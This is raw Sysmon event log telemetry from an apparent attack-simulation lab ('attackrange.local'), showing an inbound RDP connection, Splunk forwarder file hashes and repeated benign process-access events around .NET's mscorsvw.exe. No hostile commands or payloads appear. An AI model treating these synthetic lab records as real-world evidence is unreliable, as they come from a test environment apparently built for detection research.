SERVICEtcpfalsefalse5.188.206.230-65243-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050290Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:35.364{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B24300AC620DB833AFBA5BE581A0981,SHA256=9B78CC36539A14868C55B49C8244A4B44B8F8497DC83B961EB7BDFBC7D8144FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050289Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:35.255{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=010B17DC22C5012F78FF7D9E94AFA5D4,SHA256=50DCA80D0519C7E034F007CCD151F99DD0E4529E5983F5C1538E2255315C4D23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075132Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.983{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-060D-00000000BB01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075131Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.983{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-060D-00000000BB01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.920{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-050D-00000000BB01}2428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.905{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-050D-00000000BB01}2428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.905{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-050D-00000000BB01}2428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.842{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-040D-00000000BB01}1852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.827{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-040D-00000000BB01}1852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.827{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-040D-00000000BB01}1852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.780{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-030D-00000000BB01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.780{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-030D-00000000BB01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.764{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-030D-00000000BB01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.717{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-020D-00000000BB01}6092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.686{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-020D-00000000BB01}6092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.686{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-020D-00000000BB01}6092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.639{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-010D-00000000BB01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.608{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-010D-00000000BB01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.608{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-010D-00000000BB01}5076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000075115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.592{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9BB264DBECEC4A05AC26DA70745E01EC,SHA256=25DBBE52832BC0EF895B82145FE00B076B29B08540A455F220EC464363669A58,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.561{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-000D-00000000BB01}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.514{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-000D-00000000BB01}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.514{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-000D-00000000BB01}3924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.467{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-FF0C-00000000BB01}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.374{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-FF0C-00000000BB01}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 